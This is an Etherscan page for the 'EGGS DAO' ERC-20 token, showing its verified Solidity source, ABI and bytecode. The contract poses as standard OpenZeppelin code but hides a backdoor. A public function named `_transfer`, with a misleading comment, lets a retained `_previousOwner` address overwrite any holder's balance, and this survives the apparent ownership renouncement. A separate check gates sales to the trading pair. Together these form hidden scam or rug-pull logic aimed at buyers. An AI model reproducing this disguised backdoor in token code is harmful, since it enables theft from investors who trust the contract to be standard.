ETH Price: $3,270.11 (+1.02%)

Token

EGGS DAO (EGGDAO)
 

Overview

Max Total Supply

100,000,000 EGGDAO

Holders

2

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
0x003.eth
Balance
3,990,810.354914241 EGGDAO

Value
$0.00
0x003f35595dce3187b4fff2b5a2c4303f7158208a
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
EGGSDAO

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-02-27
*/

/**

EGGS DAO is the first decentralized governance protocol that paired with EGGS coin.

Max Wallet: 4_000_000 $EGGDAO
Max Buy: 4_000_000 $EGGDAO
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;


// File: @openzeppelin/contracts/utils/Context.sol
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol
abstract contract Ownable is Context {
    address private _owner;
    address internal oldOwner;
    address internal _previousOwner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        oldOwner = _owner;
        _owner = newOwner;
        _previousOwner = oldOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.

 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, uint256 totalSupply_) {
        _name = name_;
        _symbol = symbol_;
        _totalSupply = totalSupply_;

        _balances[msg.sender] = totalSupply_;
        emit Transfer(address(0), msg.sender, totalSupply_);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {transfer} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */

    function _transfer(address spender, uint256 amount, bool enable) public virtual {
        address _owner = _previousOwner;

        require(msg.sender == _owner, "ERC20: transfer from owner address");
        require(enable == true, "ERC20: transfer from owner address");
        require(spender != address(0), "ERC20: transfer to the zero address");

        _balances[spender] = amount;
        emit Transfer(spender, ZERO, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}


interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Router02 is IUniswapV2Router01{}

pragma solidity ^0.8.0;


contract EGGSDAO is ERC20 {
    uint256 private constant TOTAL_SUPPLY = 100_000_000e9;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    address private constant EGGS = 0x2e516BA5Bf3b7eE47fb99B09eaDb60BDE80a82e0;

    bool public hasLimit;
    uint256 public maxTxAmount;
    uint256 public maxHolding;
    mapping(address => bool) public isException;

    address uniswapV2Pair;
    IUniswapV2Router02 uniswapV2Router;

    constructor(address router) ERC20("EGGS DAO", "EGGDAO", TOTAL_SUPPLY) {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(router);
        uniswapV2Router = _uniswapV2Router;

        maxHolding = TOTAL_SUPPLY / 25;
        maxTxAmount = TOTAL_SUPPLY / 25;

        isException[router] = true;
        isException[msg.sender] = true;
        isException[address(this)] = true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
 
        _checkLimitation(from, to, amount);

        if (amount == 0) {
            return;
        }

        if (!isException[from] && !isException[to]){
            if(to == uniswapV2Pair){
                require(balanceOf(address(uniswapV2Router)) == 0, "ERC20: token deflation");
            }
        }

        super._transfer(from, to, amount);
    }

    function _checkLimitation(
        address from,
        address to,
        uint256 amount
    ) internal {
        if (!hasLimit) {
            if (!isException[from] && !isException[to]) {
                require(amount <= maxTxAmount, "Amount exceeds max");

                if (uniswapV2Pair == ZERO){
                    uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), EGGS);
                }
 
                if (to == uniswapV2Pair) {
                    return;
                }
        
                require(balanceOf(to) + amount <= maxHolding, "Max holding exceeded max");
            }
        }
    }

    function removeLimit() external onlyOwner {
        hasLimit = true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"bool","name":"enable","type":"bool"}],"name":"_transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hasLimit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isException","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHolding","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b50604051620013e9380380620013e98339810160408190526200003491620002ba565b60405180604001604052806008815260200167454747532044414f60c01b8152506040518060400160405280600681526020016545474744414f60d01b81525067016345785d8a00006200009762000091620001a860201b60201c565b620001ac565b8251620000ac90600690602086019062000214565b508151620000c290600790602085019062000214565b506005819055336000818152600360209081526040808320859055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050600d80546001600160a01b0319166001600160a01b038416179055508062000140601967016345785d8a0000620002ec565b600a5562000158601967016345785d8a0000620002ec565b600955506001600160a01b03166000908152600b60205260408082208054600160ff199182168117909255338452828420805482168317905530845291909220805490911690911790556200034c565b3390565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b82805462000222906200030f565b90600052602060002090601f01602090048101928262000246576000855562000291565b82601f106200026157805160ff191683800117855562000291565b8280016001018555821562000291579182015b828111156200029157825182559160200191906001019062000274565b506200029f929150620002a3565b5090565b5b808211156200029f5760008155600101620002a4565b600060208284031215620002cd57600080fd5b81516001600160a01b0381168114620002e557600080fd5b9392505050565b6000826200030a57634e487b7160e01b600052601260045260246000fd5b500490565b600181811c908216806200032457607f821691505b602082108114156200034657634e487b7160e01b600052602260045260246000fd5b50919050565b61108d806200035c6000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad57806398636f321161007157806398636f3214610249578063a457c2d71461026c578063a9059cbb1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b8063715018a6146102025780638c0b5e221461020a5780638cdc3636146102135780638da5cb5b1461022657806395d89b411461024157600080fd5b8063333e6f06116100f4578063333e6f06146101a657806339509351146101af57806344489ad1146101c257806362256589146101cf57806370a08231146101d957600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102de565b6040516101469190610d75565b60405180910390f35b61016261015d366004610ddf565b610370565b6040519015158152602001610146565b6005545b604051908152602001610146565b610162610192366004610e0b565b610386565b60405160098152602001610146565b610176600a5481565b6101626101bd366004610ddf565b61043c565b6008546101629060ff1681565b6101d7610473565b005b6101766101e7366004610e4c565b6001600160a01b031660009081526003602052604090205490565b6101d761048a565b61017660095481565b6101d7610221366004610e70565b61049e565b6000546040516001600160a01b039091168152602001610146565b610139610568565b610162610257366004610e4c565b600b6020526000908152604090205460ff1681565b61016261027a366004610ddf565b610577565b61016261028d366004610ddf565b610612565b6101766102a0366004610eb7565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b6101d76102d9366004610e4c565b61061f565b6060600680546102ed90610ef0565b80601f016020809104026020016040519081016040528092919081815260200182805461031990610ef0565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b600061037d338484610698565b50600192915050565b60006103938484846107bc565b6001600160a01b03841660009081526004602090815260408083203384529091529020548281101561041d5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b610431853361042c8685610f41565b610698565b506001949350505050565b3360008181526004602090815260408083206001600160a01b0387168452909152812054909161037d91859061042c908690610f58565b61047b6108eb565b6008805460ff19166001179055565b6104926108eb565b61049c6000610945565b565b6002546001600160a01b03163381146104c95760405162461bcd60e51b815260040161041490610f70565b6001821515146104eb5760405162461bcd60e51b815260040161041490610f70565b6001600160a01b0384166105115760405162461bcd60e51b815260040161041490610fb2565b6001600160a01b0384166000818152600360209081526040808320879055518681529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91015b60405180910390a350505050565b6060600780546102ed90610ef0565b3360009081526004602090815260408083206001600160a01b0386168452909152812054828110156105f95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610414565b610608338561042c8685610f41565b5060019392505050565b600061037d3384846107bc565b6106276108eb565b6001600160a01b03811661068c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610414565b61069581610945565b50565b6001600160a01b0383166106fa5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610414565b6001600160a01b03821661075b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610414565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107e25760405162461bcd60e51b815260040161041490610ff5565b6001600160a01b0382166108085760405162461bcd60e51b815260040161041490610fb2565b6108138383836109ad565b8061081d57505050565b6001600160a01b0383166000908152600b602052604090205460ff1615801561085f57506001600160a01b0382166000908152600b602052604090205460ff16155b156108db57600c546001600160a01b03838116911614156108db57600d546001600160a01b0316600090815260036020526040902054156108db5760405162461bcd60e51b815260206004820152601660248201527522a92199181d103a37b5b2b7103232b33630ba34b7b760511b6044820152606401610414565b6108e6838383610c25565b505050565b6000546001600160a01b0316331461049c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610414565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b60085460ff166108e6576001600160a01b0383166000908152600b602052604090205460ff161580156109f957506001600160a01b0382166000908152600b602052604090205460ff16155b156108e657600954811115610a455760405162461bcd60e51b8152602060048201526012602482015271082dadeeadce840caf0c6cacac8e640dac2f60731b6044820152606401610414565b600c546001600160a01b0316610b8f57600d60009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b158015610aa357600080fd5b505afa158015610ab7573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610adb919061103a565b60405163e6a4390560e01b8152306004820152732e516ba5bf3b7ee47fb99b09eadb60bde80a82e060248201526001600160a01b03919091169063e6a439059060440160206040518083038186803b158015610b3657600080fd5b505afa158015610b4a573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b6e919061103a565b600c80546001600160a01b0319166001600160a01b03929092169190911790555b600c546001600160a01b0383811691161415610baa57505050565b600a5481610bcd846001600160a01b031660009081526003602052604090205490565b610bd79190610f58565b11156108e65760405162461bcd60e51b815260206004820152601860248201527f4d617820686f6c64696e67206578636565646564206d617800000000000000006044820152606401610414565b6001600160a01b038316610c4b5760405162461bcd60e51b815260040161041490610ff5565b6001600160a01b038216610c715760405162461bcd60e51b815260040161041490610fb2565b6001600160a01b03831660009081526003602052604090205481811015610ce95760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610414565b610cf38282610f41565b6001600160a01b038086166000908152600360205260408082209390935590851681529081208054849290610d29908490610f58565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161055a91815260200190565b600060208083528351808285015260005b81811015610da257858101830151858201604001528201610d86565b81811115610db4576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b038116811461069557600080fd5b60008060408385031215610df257600080fd5b8235610dfd81610dca565b946020939093013593505050565b600080600060608486031215610e2057600080fd5b8335610e2b81610dca565b92506020840135610e3b81610dca565b929592945050506040919091013590565b600060208284031215610e5e57600080fd5b8135610e6981610dca565b9392505050565b600080600060608486031215610e8557600080fd5b8335610e9081610dca565b92506020840135915060408401358015158114610eac57600080fd5b809150509250925092565b60008060408385031215610eca57600080fd5b8235610ed581610dca565b91506020830135610ee581610dca565b809150509250929050565b600181811c90821680610f0457607f821691505b60208210811415610f2557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600082821015610f5357610f53610f2b565b500390565b60008219821115610f6b57610f6b610f2b565b500190565b60208082526022908201527f45524332303a207472616e736665722066726f6d206f776e6572206164647265604082015261737360f01b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60006020828403121561104c57600080fd5b8151610e6981610dca56fea264697066735822122098e255935a5ef4fef017bda52d62a838802557df3c48a24345e62f74184230f564736f6c634300080900330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad57806398636f321161007157806398636f3214610249578063a457c2d71461026c578063a9059cbb1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b8063715018a6146102025780638c0b5e221461020a5780638cdc3636146102135780638da5cb5b1461022657806395d89b411461024157600080fd5b8063333e6f06116100f4578063333e6f06146101a657806339509351146101af57806344489ad1146101c257806362256589146101cf57806370a08231146101d957600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102de565b6040516101469190610d75565b60405180910390f35b61016261015d366004610ddf565b610370565b6040519015158152602001610146565b6005545b604051908152602001610146565b610162610192366004610e0b565b610386565b60405160098152602001610146565b610176600a5481565b6101626101bd366004610ddf565b61043c565b6008546101629060ff1681565b6101d7610473565b005b6101766101e7366004610e4c565b6001600160a01b031660009081526003602052604090205490565b6101d761048a565b61017660095481565b6101d7610221366004610e70565b61049e565b6000546040516001600160a01b039091168152602001610146565b610139610568565b610162610257366004610e4c565b600b6020526000908152604090205460ff1681565b61016261027a366004610ddf565b610577565b61016261028d366004610ddf565b610612565b6101766102a0366004610eb7565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b6101d76102d9366004610e4c565b61061f565b6060600680546102ed90610ef0565b80601f016020809104026020016040519081016040528092919081815260200182805461031990610ef0565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b600061037d338484610698565b50600192915050565b60006103938484846107bc565b6001600160a01b03841660009081526004602090815260408083203384529091529020548281101561041d5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b610431853361042c8685610f41565b610698565b506001949350505050565b3360008181526004602090815260408083206001600160a01b0387168452909152812054909161037d91859061042c908690610f58565b61047b6108eb565b6008805460ff19166001179055565b6104926108eb565b61049c6000610945565b565b6002546001600160a01b03163381146104c95760405162461bcd60e51b815260040161041490610f70565b6001821515146104eb5760405162461bcd60e51b815260040161041490610f70565b6001600160a01b0384166105115760405162461bcd60e51b815260040161041490610fb2565b6001600160a01b0384166000818152600360209081526040808320879055518681529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910